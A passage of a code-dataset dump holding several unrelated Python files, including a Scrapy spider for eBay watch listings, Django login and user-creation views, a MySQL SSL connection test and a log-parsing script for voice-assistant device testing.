standing[\"GA\"][j] += fthg_game\n standing[\"GD\"][j] += ftag_game-fthg_game \n # Convert to Pandas\n standing = pd.DataFrame(standing)\n \n return standing\n\n# Rank standing pandas based on ranking rules of country\ndef rank(standing, country_data):\n import numpy as np\n import pandas as pd\n \n seasons = sorted(list(set(standing[\"Season\"])))\n ranking_rules = country_data[\"ranking\"]\n \n for season in seasons:\n # Rank\n standing_season = standing[standing.Season == season].sort_values(ranking_rules,ascending=[0,0,0])\n \n # Add ranking number (1-number_of_teams) \n for i in range(len(standing_season)):\n standing.loc[standing_season.index[i],\"R\"] = i + 1\n \n \n return standing","sub_path":"app_betting/code/functions/game_to_team.py","file_name":"game_to_team.py","file_ext":"py","file_size_in_byte":4286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"591926914","text":"# Make an particles.in file\n\nimport numpy as np\n\n# End points of line in grid coordinates\nx0, x1 = 63.55, 123.45\ny0, y1 = 90.0, 90\n\n# Number of particles along the line\nNpart = 1000\n\n# Fixed particle depth\nZ = 5\n\nX = np.linspace(x0, x1, Npart)\nY = np.linspace(y0, y1, Npart)\n\nf = open(\"outline.rls\", mode=\"w\")\n\nfor i, (x, y) in enumerate(zip(X, Y)):\n f.write(\"1989-05-24T12 {:7.3f} {:7.3f} {:6.1f}\\n\".format(x, y, Z))\n\nf.close()\n","sub_path":"examples/outline/make_release.py","file_name":"make_release.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"3642310","text":"import scrapy\n\n\nclass WatchesSpider(scrapy.Spider):\n name = 'watches'\n start_urls = ['https://www.ebay.com/sch/i.html?_from=R40&_oac=1&_prodsch=1&_dmd=1&LH_BIN=1&_ipg=200&_nkw=watches&_dcat=31387&rt=nc&_mPrRngCbx=1&_udlo=400&_udhi']\n # start_urls = ['https://www.ebay.com/sch/i.html?_from=R40&_oac=1&_prodsch=1&_dmd=1&LH_BIN=1&_mPrRngCbx=1&_udlo=400&_udhi=&_nkw=watches&_ipg=25&rt=nc']\n def parse(self, response):\n # follow pagination links\n for href in response.xpath('//a[@class=\"gspr next\"]/@href'):\n yield response.follow(href, self.parse)\n\n # follow links to wathes pages\n for href in response.css('h3.lvtitle a::attr(href)'):\n yield response.follow(href, self.parse_watches)\n\n def parse_watches(self, response):\n id_pos = response.url.find('?')\n id = response.url[id_pos+5:id_pos+17]\n img_url = False\n for url in response.xpath('//*[@class=\"app-filmstrip__image cc-image\"]/@src').extract():\n img_name_pos = url.find('s-l')\n if img_name_pos != -1:\n img_url = url\n break\n if not img_url:\n for url in response.xpath('//img[contains(@class,\"vi-image-gallery__image\")]/@src').extract():\n img_name_pos = url.find('s-l')\n if img_name_pos != -1:\n img_url = url\n break\n if img_url:\n img_url = img_url[:img_name_pos+2]+\"l1600.jpg\"\n else:\n img_url = response.xpath('//img[contains(@class,\"vi-image-gallery__image vi-image-gallery__image--absolute-center\")]/@src').extract_first()\n yield {\n 'id': id,\n 'item_url': response.url, \n 'price': response.xpath('//h2[@class=\"display-price\"]//text()').extract_first(),\n 'image_urls': [img_url],\n 'name': response.css('h1.product-title::text').extract_first().strip(),\n }","sub_path":"ebay/spiders/watches_spider.py","file_name":"watches_spider.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} 
+{"seq_id":"323838097","text":"documents = [\n {\"type\": \"passport\", \"number\": \"2207 876234\", \"name\": \"Василий Гупкин\"},\n {\"type\": \"invoice\", \"number\": \"11-2\", \"name\": \"Геннадий Покемонов\"},\n {\"type\": \"insurance\", \"number\": \"10006\", \"name\": \"Аристарх Павлов\"}\n]\n\ndirectories = {\n '1': ['2207 876234', '11-2'],\n '2': ['10006'],\n '3': []\n}\n\n\n# p – people – команда, которая спросит номер документа и выведет имя человека, которому он принадлежит;\n\ndef get_document_owner(people):\n user_input = input('Введите номер документа: ')\n name = 0\n for person in people:\n if user_input == person['number']:\n name += 1\n print(person['name'])\n if name == 0:\n print('Документ не найден')\n\n\n# get_document_owner(documents)\n\n\n# l– list – команда, которая выведет список всех документов в формате passport \"2207 876234\" \"Василий Гупкин\";\n\ndef get_documents_info(people):\n info = []\n for person in people:\n person_info = []\n person_info.append(person[\"type\"])\n person_info.append(person[\"number\"])\n person_info.append(person[\"name\"])\n info.append(person_info)\n return info\n\n\n# get_documents_info(documents)\n\n\n# s – shelf – команда, которая спросит номер документа и выведет номер полки, на которой он находится;\n\ndef get_shelf_number_by_document_number(shelves):\n shelf = 0\n user_input = input('Введите номер документа: ')\n for shelf_num, document in shelves.items():\n if user_input in document:\n shelf += 1\n print(shelf_num)\n if shelf == 0:\n print('Документ не найден ни на одной из полок')\n\n\n# get_shelf_number_by_document_number(directories)\n\n\n# a – add – команда, которая добавит новый документ в каталог и в перечень полок, спросив его номер, тип, имя владельца\n# и номер полки, на котором он будет храниться.\n\ndef add_document_and_shelf():\n doc_num = input('Введите номер документа: ')\n doc_type = input('Введите тип документа: ')\n owners_name = input('Введите имя владельца документа: ')\n shelf_num = input('Введите номер полки: ')\n documents.append({\"type\": doc_type, \"number\": doc_num, \"name\": owners_name})\n if shelf_num in directories.keys():\n directories[shelf_num].append(doc_num)\n else:\n directories[shelf_num] = list()\n directories[shelf_num].append(doc_num)\n print(documents)\n print()\n print(directories)\n\n\n\n\ndef main():\n user_input = input('Введите команду: ')\n if user_input == 'p':\n get_document_owner(documents)\n elif user_input == 'l':\n get_documents_info(documents)\n elif user_input == 's':\n get_shelf_number_by_document_number(directories)\n elif user_input == 'a':\n add_document_and_shelf()\n else:\n print('Несуществующая команда')\n\n\n","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":3370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"181027638","text":"from django.contrib.auth import authenticate\nfrom rest_framework.views import APIView\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom .serializers import UserSerializer, CredentialSerializer\nfrom django.contrib.auth.models import User\nfrom rest_framework.authtoken.models import Token\nfrom rest_framework import status\nfrom django.db import transaction\n\n\nclass CreateUserView(APIView):\n def post(self, request):\n serializer = UserSerializer(data=request.data)\n\n if not serializer.is_valid():\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n try:\n with 
transaction.atomic():\n user = User.objects.create_user(\n username=request.data[\"username\"],\n password=request.data[\"password\"],\n is_superuser=request.data[\"is_superuser\"],\n is_staff=request.data[\"is_staff\"],\n )\n serializer = UserSerializer(user)\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n except:\n return Response(\n {\"error\": \"User already exists\"}, status=status.HTTP_409_CONFLICT\n )\n\n\nclass LoginView(APIView):\n def post(self, request):\n serializer = CredentialSerializer(data=request.data)\n\n if not serializer.is_valid():\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n user = authenticate(\n username=request.data[\"username\"], password=request.data[\"password\"]\n )\n\n if user:\n token = Token.objects.get_or_create(user=user)[0]\n return Response({\"token\": token.key})\n else:\n return Response(status=status.HTTP_401_UNAUTHORIZED)\n","sub_path":"accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"301200203","text":"# -*- coding: utf-8 -*-\n\n# Copyright (c) 2016, 2017, Oracle and/or its affiliates. All rights reserved.\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License, version 2.0, as\n# published by the Free Software Foundation.\n#\n# This program is also distributed with certain software (including\n# but not limited to OpenSSL) that is licensed under separate terms,\n# as designated in a particular file or component or in included license\n# documentation. The authors of MySQL hereby grant you an\n# additional permission to link the program and your derivative works\n# with the separately licensed software that they have included with\n# MySQL.\n#\n# Without limiting anything contained in the foregoing, this file,\n# which is part of MySQL Connector/Python, is also subject to the\n# Universal FOSS Exception, version 1.0, a copy of which can be found at\n# http://oss.oracle.com/licenses/universal-foss-exception.\n#\n# This program is distributed in the hope that it will be useful, but\n# WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n# See the GNU General Public License, version 2.0, for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software Foundation, Inc.,\n# 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n\n\"\"\" BUG21879914 Fix using C/Extension with only CA given\n\"\"\"\n\nimport os.path\nimport unittest\n\nimport mysql.connector\nfrom tests import foreach_cnx, cnx_config\nimport tests\n\ntry:\n from mysql.connector.connection_cext import CMySQLConnection\nexcept ImportError:\n # Test without C Extension\n CMySQLConnection = None\n\nTEST_SSL = {\n 'ca': os.path.join(tests.SSL_DIR, 'tests_CA_cert.pem'),\n 'cert': os.path.join(tests.SSL_DIR, 'tests_client_cert.pem'),\n 'key': os.path.join(tests.SSL_DIR, 'tests_client_key.pem'),\n}\n\nOPTION_FILE = os.path.join('tests', 'data', 'option_files', 'my.cnf')\n\nclass Bug21879914(tests.MySQLConnectorTests):\n\n def test_ssl_cipher_in_option_file(self):\n config = tests.get_mysql_config()\n config['ssl_ca'] = TEST_SSL['ca']\n config['use_pure'] = False\n config.pop('unix_socket')\n\n cnx = mysql.connector.connect(**config)\n cnx.cmd_query(\"SHOW STATUS LIKE 'Ssl_cipher'\")\n 
self.assertNotEqual(cnx.get_row()[1], '') # Ssl_cipher must have a value\n","sub_path":"external/mysql/mysql-connector-python-8.0.11/tests/issues/test_bug21879914.py","file_name":"test_bug21879914.py","file_ext":"py","file_size_in_byte":2478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"531693013","text":"# Function to sort the list of tuples by its last item \r\ndef sortTuple(tup):\r\n\t\r\n\t# Checking last element type for sorting\r\n\tchar = tup[0][-1]\r\n\r\n\t# Handling Integer Last Element for sorting\r\n\tif char.isdigit():\r\n\t\ttup.sort(key = lambda x: int(x[-1].replace('\\'','')))\r\n\r\n\t# Handling String Last Element (irrespective of case) for sorting\r\n\telse:\r\n\t\ttup.sort(key = lambda x: x[-1].lower()) \r\n\r\n\treturn tup\r\n\r\n\r\n# User Tuple Input\r\ni = input(\"Enter List Of Tuples\")\r\n\r\nl = []\r\n\r\n# Creating List of Tuples\r\nfor tup in i.split('),('):\r\n\ttup = tup.replace(')','').replace('(','')\r\n\ttup = tup.replace('\\'','')\r\n\tl.append(tuple(tup.split(',')))\r\n\r\n# Driver Code\r\nprint(sortTuple(l))\r\n\r\n\r\n# Sample Test Cases\r\n''' \r\n\r\n\t('abcd','hi',5),('bacd','hi',10),('cabd','hi',9),('dacb','hi',20),('aabc','hi',6),('bacc','hi',18)\r\n\t(5,'hi','abcd'),(10,'hi','Bacd'),(9,'hi','cabd'),(20,'hi','dacb'),(6,'hi','Aabc'),(18,'hi','bacc')\r\n\r\n'''","sub_path":"Python/tuple_sort.py","file_name":"tuple_sort.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"648192042","text":"# -*- coding: utf-8-*-\nimport ast\nimport os\nimport queue\nimport subprocess\nimport sys\nimport threading\nimport time\n\nimport psutil as psutil\nfrom pykeyboard import PyKeyboard\n\nk = PyKeyboard()\nQueue = queue\nL = threading.Lock()\n\n\ndef set_clipboard_text(_t):\n p = subprocess.Popen(['pbcopy'], stdin=subprocess.PIPE)\n p.stdin.write(_t.encode('utf-8'))\n p.stdin.close()\n p.communicate()\n time.sleep(.03)\n\n\ndef paste():\n k.press_key('Command')\n k.tap_key('v')\n time.sleep(0.03)\n k.release_key('Command')\n\n\ndef click(n):\n time.sleep(.03)\n k.tap_key(n)\n time.sleep(.03)\n\n\ndef auto_set(_text, _sn):\n global L\n if only_wakeup:\n return\n L.acquire()\n try:\n _as(_text, _sn)\n except Exception as e1:\n print(repr(e1))\n L.release()\n\n\ndef _as(_text, _sn):\n print(_text + '\\t' + _sn)\n for d in range(len(ACTIVE_DEVICES)):\n d = str(d)\n if ('text' + d) not in DATA:\n return\n if DATA['text' + d] == '':\n return\n\n for s in range(len(ACTIVE_DEVICES)):\n s = str(s)\n set_clipboard_text(DATA['text' + s])\n paste()\n time.sleep(0.03)\n click('Tab')\n time.sleep(0.03)\n set_clipboard_text(DATA['sn' + s])\n time.sleep(0.03)\n paste()\n time.sleep(0.03)\n if int(s) == len(ACTIVE_DEVICES) - 1:\n click('Return')\n time.sleep(0.03)\n else:\n click('Tab')\n time.sleep(0.03)\n # for e in range(len(ACTIVE_DEVICES)):\n # k.press_key('Shift')\n # click(\"Tab\")\n # k.release_key('Shift')\n # time.sleep(0.03)\n # if int(e) != len(ACTIVE_DEVICES) - 1:\n # k.press_key('Shift')\n # click(\"Tab\")\n # k.release_key('Shift')\n # time.sleep(0.03)\n if write_rec:\n msg = ''\n for s in range(len(ACTIVE_DEVICES)):\n msg += DATA['text' + str(s)] + '\\t' + DATA['sn' + str(s)]\n if s + 1 != len(ACTIVE_DEVICES):\n msg += '\\t'\n t.save_memory(SAVE_RESULTS, msg + '\\r')\n\n for d in range(len(ACTIVE_DEVICES)):\n d = str(d)\n DATA['text' + d] = DATA['sn' + d] = ''\n\n\ndef write_wakeup(no):\n L.acquire()\n p = 
sys.argv[0].split('/')\n if only_wakeup:\n with open('/%s/%s/..wakeup' % (p[1], p[2]), 'a') as f:\n f.write(ACTIVE_DEVICES[int(no)] + '\\n')\n for d in range(len(ACTIVE_DEVICES)):\n d = str(d)\n DATA['text' + d] = DATA['sn' + d] = ''\n if ('wakeup_count' + no) in DATA:\n DATA['wakeup_count' + no] += 1\n else:\n DATA['wakeup_count' + no] = 1\n # if len(arg) > 0:\n # txt.txt_log.write(\n # str(ACTIVE_DEVICES[int(no)]) + u' 唤醒次数 ' + str(DATA['wakeup_count' + no]) + '_' + str(arg[0]) + '\\r')\n #\n # elif ('wakeup_angle' + no) in DATA:\n # txt.txt_log.write(str(ACTIVE_DEVICES[int(no)]) + u' 唤醒次数 ' + str(DATA['wakeup_count' + no]) + '_' + DATA[\n # 'wakeup_angle' + no] + '\\r')\n # else:\n # txt.txt_log.write(str(ACTIVE_DEVICES[int(no)]) + u' 唤醒次数 ' + str(DATA['wakeup_count' + no]) + '\\r')\n print(ACTIVE_DEVICES[int(no)] + ' 唤醒次数: ' + str(DATA['wakeup_count' + no]))\n L.release()\n\n\nonly_wakeup = False\nwrite_rec = False\nis_save_log = False\nstop_self = False\nrestart_self = False\nSAVE_RESULTS = r'~/Desktop/res.log'\nSAVE_AUDIO = r'~/Desktop/audio'\ntd = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n\nACTIVE_DEVICES = [] # 激活的设备\nCURRENT_MODULE = '小度在家' # 当前模式\nmods = []\nlogs = []\n\nMOD_AINEMO_LAUNCHER = '小度在家'\nMOD_AINEMO_DEMO = '小度在家demo'\nMOD_CW_LAUNCHER = '小维AI'\nMOD_CW_DEMO = '创维TV'\nMOD_HUAWEI_LAUNCHER = '华为'\nMOD_HUAWEI_DEMO = '华为demo'\nMOD_CW_BOX = '创维盒子'\nMOD_Max = 'Max'\nMOD_XIAODUBOX = '小度音箱'\nMOD_XGP = '小钢炮'\nMOD_CW_BOX_DEMO = '创维盒子demo'\nMOD_AINEMO_1S = '小度在家1S'\nMOD_AINEMO_1L_DEMO = '小度在家1L-demo'\nMOD_AINEMO_1C = '小度在家1C'\nMOD_KUANYANG = '宽洋'\nMOD_esp32 = 'esp32'\nMOD_DRIVER = '车机'\nMOD_VENUS = 'VENUS'\nMOD_CM = '创米盒子'\n\nMOD_LIST = [MOD_CW_DEMO,\n ]\n\nDATA = {}\n\n\nclass MODULE(object):\n def __init__(self):\n self.stime = ''\n self.num = 1\n\n def main_doing(self, _line, _module, no):\n if _module == MOD_CW_DEMO:\n self.module_chuangwei_demo(_line, no)\n elif _module == MOD_CW_LAUNCHER:\n self.module_chuangwei_launcher(_line, no)\n elif _module == MOD_HUAWEI_LAUNCHER:\n self.module_huawei_launcher(_line, no)\n elif _module == MOD_AINEMO_LAUNCHER:\n self.module_ainemo(_line, no)\n elif _module == MOD_AINEMO_DEMO:\n self.module_ainemo_demo(_line, no)\n elif _module == MOD_HUAWEI_DEMO:\n self.module_huawei2(_line, no)\n elif _module == MOD_CW_BOX:\n self.module_cw_box(_line, no)\n elif _module == MOD_CW_BOX_DEMO:\n self.module_cw_show_demo(_line, no)\n elif _module == MOD_XGP:\n self.module_xgp(_line, no)\n elif _module == MOD_XIAODUBOX:\n self.module_xdbox(_line, no)\n elif _module == MOD_Max:\n self.module_max(_line, no)\n elif _module == MOD_AINEMO_1S:\n self.module_ainemo_1s(_line, no)\n elif _module == MOD_AINEMO_1L_DEMO:\n self.module_ainemo_1l_demo(_line, no)\n elif _module == MOD_AINEMO_1C:\n self.module_ainemo_1c(_line, no)\n elif _module == MOD_KUANYANG:\n self.module_ky(_line, no)\n elif _module == MOD_esp32:\n self.module_ep(_line, no)\n elif _module == MOD_DRIVER:\n self.module_driver(_line, no)\n elif _module == MOD_VENUS:\n self.module_venus(_line, no)\n elif _module == MOD_CM:\n self.module_chuangmi(_line, no)\n\n @staticmethod\n def module_chuangmi(line, no):\n pass\n\n @staticmethod\n def module_venus(line, no):\n if '--------wakeup--------' in line:\n write_wakeup(no)\n if 'FinalAsrResult' in line:\n text = line[line.find('[\"') + 2: line.find('\"]')]\n sn = line[line.find('dlg_') + 4:-1]\n DATA['text' + no] = text\n DATA['sn' + no] = sn\n auto_set(DATA['text' + no], DATA['sn' + no])\n\n @staticmethod\n def module_driver(line, no):\n if line.find(\"wp.data\") != 
-1:\n if \"你好航小瓜\" not in line and \"你好魔方\" not in line and \"小可爱\" not in line:\n # print(line)2660875263. word\n rec_result = line.split(':')\n res = rec_result[8]\n wp_data = res.split('.')\n sid = \"\"\n wp = wp_data[0]\n print(wp)\n text = wp\n sn = sid\n res_final = text + ',' + sn\n DATA['text' + no] = text\n DATA['sn' + no] = sn\n auto_set(DATA['text' + no], DATA['sn' + no])\n\n @staticmethod\n def module_ep(line, no):\n if 'status=1' in line:\n write_wakeup(no)\n elif 'asr result:' in line and 'corpus_no' in line:\n line = ast.literal_eval(line[line.find('{'):line.rfind('}') + 1])\n text = line['result']['word'][0]\n sn = line['sn']\n corpus = str(line['corpus_no'])\n DATA['text' + no] = text\n DATA['sn' + no] = sn + \"_\" + corpus\n auto_set(DATA['text' + no], DATA['sn' + no])\n\n @staticmethod\n def module_ky(line, no):\n if u'唤醒成功' in line:\n write_wakeup(no)\n elif '\\\"type\\\":\\\"FINAL\\\"' in line:\n line = ast.literal_eval(line[line.find('{'):line.rfind('}') + 1])\n text = line['directive']['payload']['text']\n DATA['text' + no] = text\n DATA['sn' + no] = line['directive']['header']['dialogRequestId']\n auto_set(text, DATA['sn' + no])\n\n @staticmethod\n def module_ainemo_1c(line, no):\n if 'wakeup_time' in line and 'wp.data' in line and 'WakeUpEngine' in line:\n write_wakeup(no)\n elif 'asr_reject' in line and 'state' in line and 'asr_result':\n line = ast.literal_eval(line[line.find('{'):line.rfind('}') + 1])\n reject = line['asr_reject']\n if reject == 0:\n reject = 'True'\n else:\n reject = 'False'\n state = line['state']\n DATA['sn1' + no] = '&%s&%s' % (reject, state)\n elif 'Final result' in line:\n if u'极客' in line:\n return\n if ('sn1' + no) not in DATA.keys():\n DATA['sn1' + no] = ''\n line = ast.literal_eval(line[line.find('{'):line.rfind('}') + 1])\n DATA['text' + no] = line['results_recognition'][0]\n DATA['sn' + no] = line['origin_result']['sn'] + '_' + str(line['origin_result']['corpus_no']) + DATA[\n 'sn1' + no]\n auto_set(DATA['text' + no], DATA['sn' + no])\n\n @staticmethod\n def module_ainemo_1l_demo(line, no):\n if 'wakeup_time' in line and 'SpeechCallback' in line:\n write_wakeup(no)\n elif 'finalResult' in line:\n line = ast.literal_eval(line[line.find('{'):])\n text = line['results_recognition'][0]\n corpus = str(line['origin_result']['corpus_no'])\n sn = line['origin_result']['sn']\n DATA['text' + no] = text\n DATA['sn' + no] = sn + '_' + corpus\n auto_set(DATA['text' + no], DATA['sn' + no])\n\n # 小度在家1S\n @staticmethod\n def module_ainemo_1s(line, no):\n if 'asr_reject' in line and 'state' in line and 'asr_result':\n line = ast.literal_eval(line[line.find('{'):line.rfind('}') + 1])\n reject = line['asr_reject']\n if reject == 0:\n reject = 'True'\n else:\n reject = 'False'\n state = line['state']\n DATA['sn1' + no] = '&%s&%s' % (reject, state)\n if 'wakeup_time' in line and 'result' in line:\n write_wakeup(no)\n elif 'final_result' in line and 'results_recognition' in line and (\n 'finalResult' in line or 'SpeechCallback' in line):\n if u'极客' in line:\n return\n if ('sn1' + no) not in DATA.keys():\n DATA['sn1' + no] = ''\n line = ast.literal_eval(line[line.find('{'):line.rfind('}') + 1])\n DATA['text' + no] = line['results_recognition'][0]\n DATA['sn' + no] = line['origin_result']['sn'] + '_' + str(line['origin_result']['corpus_no']) + DATA[\n 'sn1' + no]\n auto_set(DATA['text' + no], DATA['sn' + no])\n\n # 创维demo识别\n @staticmethod\n def module_chuangwei_demo(line, no):\n if line.find('wakeup_time') != -1 and 'wp.data' in line and 'result' in 
line:\n write_wakeup(no)\n # if line.find(\"ASREngine\") != -1 and line.find('origin_result') != -1 and line.find('corpus_no') != -1:\n # line = ast.literal_eval(line[line.find('{'):])\n # corpus = str(line['origin_result']['corpus_no'])\n # DATA['sn' + no] = corpus\n # elif line.find('--final') != -1:\n # text = line[line.find('final: ') + 7: -1]\n # DATA['text' + no] = text\n # auto_set(text, DATA['sn' + no])\n # elif line.find('wakeup_time') != -1 and line.find('result') != -1:\n # write_wakeup(no)\n elif 'finalResult' in line:\n line = ast.literal_eval(line[line.find('{'):])\n text = line['results_recognition'][0]\n corpus = str(line['origin_result']['corpus_no'])\n sn = line['origin_result']['sn']\n DATA['text' + no] = text\n DATA['sn' + no] = sn + '_' + corpus\n auto_set(DATA['text' + no], DATA['sn' + no])\n\n # 创维launcher识别\n @staticmethod\n def module_chuangwei_launcher(line, no):\n if 'name : wp.data' in line:\n write_wakeup(no)\n elif 'corpus_no' in line and 'response' in line and 'BDSHttpRequestMaker' in line:\n # print(line[:-1])\n line = ast.literal_eval(line[line.find('{'):line.rfind('}') + 1])\n DATA['sn' + no] = line['sn'] + '_' + str(line['corpus_no'])\n elif 'onFinalReconnition' in line:\n text = line[line.rfind(': ') + 2:-1]\n DATA['text' + no] = text\n auto_set(text, DATA['sn' + no])\n\n # 华为产品包 识别\n @staticmethod\n def module_huawei_launcher(line, no):\n if line.find('SpeechCallback') != -1 and line.find('wakeup_time') != -1:\n write_wakeup(no)\n elif line.find(u'SpeechCallback') != -1 and line.find('final_result') != -1 and line.find('corpus') != -1:\n # print line\n line = ast.literal_eval(line[line.find('{'):])\n DATA['text' + no] = line['best_result']\n DATA['sn' + no] = line['origin_result']['sn'] + '_' + str(line['origin_result']['corpus_no'])\n auto_set(DATA['text' + no], DATA['sn' + no])\n\n # 小鱼识别\n @staticmethod\n def module_ainemo(line, no):\n if 'asr_reject' in line and 'state' in line and 'asr_result':\n line = ast.literal_eval(line[line.find('{'):line.rfind('}') + 1])\n reject = line['asr_reject']\n if reject == 0:\n reject = 'True'\n else:\n reject = 'False'\n state = line['state']\n DATA['sn1' + no] = '&%s&%s' % (reject, state)\n if 'wakeup_time' in line and 'SpeechCallback' in line:\n write_wakeup(no)\n elif 'final_result' in line and 'results_recognition' in line and (\n 'finalResult' in line or 'SpeechCallback' in line):\n if u'极客' in line:\n return\n if ('sn1' + no) not in DATA.keys():\n DATA['sn1' + no] = ''\n line = ast.literal_eval(line[line.find('{'):line.rfind('}') + 1])\n DATA['text' + no] = line['results_recognition'][0]\n DATA['sn' + no] = line['origin_result']['sn'] + '_' + str(line['origin_result']['corpus_no']) + DATA[\n 'sn1' + no]\n auto_set(DATA['text' + no], DATA['sn' + no])\n\n @staticmethod\n def module_ainemo_demo(line, no):\n if line.find('wakeup_time') != -1 and line.find('result') != -1:\n write_wakeup(no)\n # elif line.find(\"DCS-AsrEngine\") != -1 and line.find('logid') != -1:\n # logid = line[line.find('logid') + 8:line.find('client_ip') - 3]\n # print logid\n # DATA['sn' + no] = logid\n elif line.find('final') != -1:\n line = ast.literal_eval(line[line.find('{'):])\n text = line['results_recognition'][0]\n sn = line['origin_result']['sn']\n corpus = str(line['origin_result']['corpus_no'])\n DATA['text' + no] = text\n DATA['sn' + no] = sn + '_' + corpus\n auto_set(DATA['text' + no], DATA['sn' + no])\n\n # 华为demo\n @staticmethod\n def module_huawei2(line, no):\n if line.find('wakeup_time') != -1 and line.find('result') != 
-1:\n write_wakeup(no)\n elif line.find('Final result:') != -1:\n line = ast.literal_eval(line[line.find('{'):])\n DATA['text' + no] = line['results_recognition'][0]\n DATA['sn' + no] = line['origin_result']['sn'] + '_' + str(line['origin_result']['corpus_no'])\n auto_set(DATA['text' + no], DATA['sn' + no])\n\n # 创维box\n def module_cw_box(self, line, no):\n if line.find(\"wakeup_time\") != -1 and line.find(\"result\") != -1:\n write_wakeup(no)\n # self.stime = time.time()\n # elif 'asr.end' in line:\n # dur = float(time.time() - self.stime)\n # if dur <= 5.0:\n # print('提前截断' + str(self.num))\n # self.num += 1\n # time.sleep(1.5)\n # d.click(0.136, 0.817)\n # elif line.find('final_result') != -1 and line.find('finalResult') != -1:\n elif 'final_result' in line and 'AsrEngine' in line and 'asrEventListener' in line:\n line = ast.literal_eval(line[line.find('{'):line.rfind('}') + 1])\n text = line['results_recognition'][0]\n corpus = str(line['origin_result']['corpus_no'])\n sn = line['origin_result']['sn']\n DATA['text' + no] = text\n DATA['sn' + no] = sn + '_' + corpus\n auto_set(DATA['text' + no], DATA['sn' + no])\n self.num -= 1\n\n @staticmethod\n def module_cw_show_demo(line, no):\n # if line.find('BDSHttpRequestMaker') != -1 and line.find('corpus_no') != -1 and line.find('response') != -1:\n # line = line[line.find('{'):line.rfind('}') + 1]\n # line = ast.literal_eval(line)\n # sn = line[\"sn\"]\n # corpus = str(line['corpus_no'])\n # if 'osn' not in DATA:\n # DATA['osn'] = ''\n # if sn != DATA['osn']:\n # DATA['osn'] = sn\n # DATA['sn' + no] = sn + '_' + corpus\n if line.find('wakeup_time') != -1 and line.find('SpeechCallback') != -1:\n write_wakeup(no)\n elif line.find('Final result') != -1:\n line = ast.literal_eval(line[line.find('{'):])\n text = line['results_recognition'][0]\n corpus = str(line['origin_result']['corpus_no'])\n sn = str(line['origin_result']['sn'])\n DATA['text' + no] = text\n DATA['sn' + no] = sn + \"_\" + corpus\n auto_set(DATA['text' + no], DATA['sn' + no])\n\n def module_xgp(self, line, no):\n self.module_xdbox(line, no)\n\n @staticmethod\n def module_xdbox(line, no):\n # 小钢炮\n if 'wakeup trigger' in line:\n write_wakeup(no)\n elif 'kwd_detect' in line:\n write_wakeup(no)\n elif ('Final result' in line and 'results_recognition' in line) or 'result=asr' in line:\n line = ast.literal_eval(line[line.find('{'):line.rfind('}') + 1])\n text = line['results_recognition'][0]\n corpus = str(line['origin_result']['corpus_no'])\n sn = line['origin_result']['sn']\n DATA['text' + no] = text\n DATA['sn' + no] = sn + '_' + corpus\n auto_set(DATA['text' + no], DATA['sn' + no])\n elif (' asr finish' in line and 'm_isRunning' not in line) or (\n 'Final result' in line and 'results_recognition' not in line):\n line = ast.literal_eval(line[line.find('{'):line.rfind('}') + 1])\n text = line['result']['word'][0]\n corpus = str(line['corpus_no'])\n sn = line['sn']\n DATA['text' + no] = text\n DATA['sn' + no] = sn + \"_\" + corpus\n auto_set(DATA['text' + no], DATA['sn' + no])\n\n # audio:\n # if line.find('kwd_detect') != -1:\n # write_wakeup(no)\n # elif line.find('Final result') != -1:\n # line = ast.literal_eval(line[line.find('{'):])\n # text = line['result']['word'][0]\n # corpus = str(line['corpus_no'])\n # sn = str(line['sn'])\n # DATA['text' + no] = text\n # DATA['sn' + no] = sn + \"_\" + corpus\n # auto_set(DATA['text' + no], DATA['sn' + no])\n # 度秘\n # if 'wakeup trigger' in line:\n # write_wakeup(no)\n # elif 'finish content' in line:\n # line = 
ast.literal_eval(line[line.find('{'):])\n # text = line['result']['word'][0]\n # corpus = str(line['corpus_no'])\n # sn = line['sn']\n # DATA['text' + no] = text\n # DATA['sn' + no] = sn + '_' + corpus\n # auto_set(DATA['text' + no], DATA['sn' + no])\n\n @staticmethod\n def module_max(line, no):\n if 'wakeup_time' in line and 'Activity04WakeupAndASR' in line:\n write_wakeup(no)\n elif u'SpeechCallback' in line and 'final_result' in line:\n line = ast.literal_eval(line[line.find('{'):])\n text = line['results_recognition'][0]\n corpus = line['origin_result']['corpus_no']\n sn = line['origin_result']['sn']\n DATA['text' + no] = text\n DATA['sn' + no] = sn + '_' + str(corpus)\n auto_set(DATA['text' + no], DATA['sn' + no])\n\n\nclass AsynchronousFileReader(threading.Thread):\n \"\"\"\n Helper class to implement asynchronous reading of a file\n in a separate thread. Pushes read lines on a queue to\n be consumed in another thread.\n \"\"\"\n\n def __init__(self, fd, q):\n assert isinstance(q, Queue.Queue)\n assert callable(fd.readline)\n threading.Thread.__init__(self)\n self._fd = fd\n self._queue = q\n\n def run(self):\n \"\"\"The body of the tread: read lines and put them on the queue.\"\"\"\n for line in iter(self._fd.readline, ''):\n self._queue.put(line)\n\n def eof(self):\n \"\"\"Check whether there is no more content to expect.\"\"\"\n return not self.is_alive() and self._queue.empty()\n\n\ndef consume(command, no):\n \"\"\"\n Example of how to consume standard output and standard error of\n a subprocess asynchronously without risk on deadlocking.\n 